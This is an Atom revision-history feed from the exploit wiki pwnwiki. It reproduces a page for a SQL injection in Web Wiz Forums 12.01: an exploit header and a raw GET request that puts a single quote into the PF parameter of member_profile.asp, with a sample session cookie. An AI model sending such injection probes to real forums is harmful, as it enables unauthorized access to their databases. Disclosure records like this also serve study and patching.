https://pwnwiki.com/index.php?action=history&feed=atom&title=Web_Wiz_Forums_12.01_-_%27PF%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Web Wiz Forums 12.01 - 'PF' SQL注入漏洞 - Revision history
2026-04-14T18:34:32Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Web_Wiz_Forums_12.01_-_%27PF%27_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=2003&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection # Date: 2019-09-16 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.webwiz.net/web-wiz-f..."
2021-05-02T04:22:55Z
<p>Created page with "==EXP== <pre> # Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection # Date: 2019-09-16 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.webwiz.net/web-wiz-f..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection<br />
# Date: 2019-09-16<br />
# Exploit Author: n1x_ [MS-WEB]<br />
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm<br />
# Version: 12.01<br />
# Tested on Windows<br />
<br />
# Vulnerable parameter: PF (member_profile.asp)<br />
# GET Request<br />
<br />
GET /member_profile.asp?PF=10' HTTP/1.1<br />
Host: host<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD<br />
Connection: close<br />
Upgrade-Insecure-Requests: 1<br />
<br />
</pre></div>
Pwnwiki